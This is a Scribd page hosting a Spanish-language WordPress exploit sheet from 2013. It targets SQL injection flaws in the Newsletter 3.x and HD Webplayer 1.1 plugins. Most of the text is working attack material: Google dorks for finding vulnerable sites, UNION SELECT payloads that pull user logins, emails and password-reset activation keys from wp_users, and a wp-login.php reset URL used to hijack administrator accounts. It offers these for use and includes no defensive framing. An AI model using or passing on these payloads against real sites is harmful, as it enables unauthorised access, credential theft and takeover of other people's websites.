Scribd Logo
Upload

Welcome to Scribd!

  • Infiltracion Wordprees 2013

    Uploaded by

    Daniel Arce
    113 views2 pages
    This document contains information about exploits for WordPress plugins, including: 1. An SQL injection vulnerability in the Newsletter plugin that allows extracting username and email information from the wp_users table. 2. SQL injection vulnerabilities in the HD Webplayer plugin version 1.1 that allows extracting username, email, and password reset keys from the wp_users table and hijacking administrator accounts. 3. Instructions for using the extracted information to hijack administrator accounts.

    Original Description:

    Original Title

    infiltracion_wordprees_2013

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document contains information about exploits for WordPress plugins, including: 1. An SQL injection vulnerability in the Newsletter plugin that allows extracting username and email information from the wp_users table. 2. SQL injection vulnerabilities in the HD Webplayer plugin version 1.1 that allows extracting username, email, and password reset keys from the wp_users table and hijacking administrator accounts. 3. Instructions for using the extracted information to hijack administrator accounts.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    113 views2 pages

    Infiltracion Wordprees 2013

    Uploaded by

    Daniel Arce
    This document contains information about exploits for WordPress plugins, including: 1. An SQL injection vulnerability in the Newsletter plugin that allows extracting username and email information from the wp_users table. 2. SQL injection vulnerabilities in the HD Webplayer plugin version 1.1 that allows extracting username, email, and password reset keys from the wp_users table and hijacking administrator accounts. 3. Instructions for using the extracted information to hijack administrator accounts.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

    0
    _
    __
    __
    __
    1
    1 /' \
    __ /'__`\
    /\ \__ /'__`\
    0
    0 /\_, \
    ___ /\_\/\_\ \ \
    ___\ \ ,_\/\ \/\ \ _ ___
    1
    1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\
    0
    0
    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/
    1
    1
    \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\
    0
    0
    \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/
    1
    1
    \ \____/ >> Exploit database separated by exploit 0
    0
    \/___/
    type (local, remote, DoS, etc.)
    1
    1
    1
    0 [+] Site
    : 1337day.com
    0
    1 [+] Support e-mail : submit[at]1337day.com
    1
    0
    0
    1
    #########################################
    1
    0
    I'm DaOne member from Inj3ct0r Team
    1
    1
    #########################################
    0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    ##########################################
    # Exploit Title: WordPress plugins Newsletter SQL Injection Vulnerability
    # Date: 2013-02-04
    # Author: DaOne aka Mocking Bird
    # Home: 1337day Inj3ct0r Exploit Database
    # Software Link: http://www.satollo.net/plugins/newsletter
    # Category: webapps/php
    # Version: 3.x
    # Google dork: inurl:wp-content/plugins/newsletter/do/subscribe.php
    ##########################################
    -Exploithttp://{host}/wp-content/plugins/newsletter/do/view.php?id=99 {SQL}
    Comando 1.
    union select 1,2,concat(user_login,0x3c2d3e,user_email),4,5,6,7,8,9,10,11,12,13,
    14,15,16,17,18,19,20,21 from wp_users
    Comando 2.
    union select 1,2,concat(user_login,0x3c2d3e,user_activation_key),4,5,6,7,8,9,10,
    11,12,13,14,15,16,17,18,19,20,21 from wp_users
    Comando 3.
    wp-login.php?action=rp&key=KEY&login=admin

    ================================================================================
    ===============
    =
    SQL Injection: WordPress HD Webplayer Version 1.1
    =
    =
    =
    ================================================================================
    ===============
    METODO 1 "Dork's"
    ================================================================================
    ===============
    #DORK 1

    inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
    #DORK 2
    HD_Webplayer_Commercial_Key logo.jpg topleft 50 http
    ================================================================================
    ===============
    METODO 2 "Dork's"
    ================================================================================
    ===============
    # Dork 1 (config.php)
    inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
    # Dork 2 (playlist.php)
    inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
    # Dork 3 (General):
    inurl:"/wp-content/plugins/hd-webplayer/"
    ================================================================================
    ===============
    METODO 1
    ================================================================================
    ===============
    1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_logi
    n,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from
    +wp_users (este se coloca luego del "hd-webplayer" del Dork 1)
    ================================================================================
    ===============
    2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_k
    ey,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users (este se usa para recuperar la clav
    e de activacion, se coloca en el panel del admin OLVIDE CLAVE y poner el mail qu
    e obtuvimos luego colocar este dork a partir del + que esta en la URL)
    ================================================================================
    ===============
    3 : wp-login.php?action=rp&key=KEY&login=admin (aqui convinar la KEY y el user q
    ue obtuvimos)
    ================================================================================
    ===============
    METODO 2
    ================================================================================
    ===============
    1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoi
    d=-3 UNION SELECT 1,2,3,group_concat
    (user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users-================================================================================
    ===============
    2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoi
    d=-3 UNION SELECT 1,2,3,group_concat
    (user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users-================================================================================
    ===============
    3 : wp-login.php?action=rp&key=KEY&login=admin
    ================================================================================
    ===============

    You might also like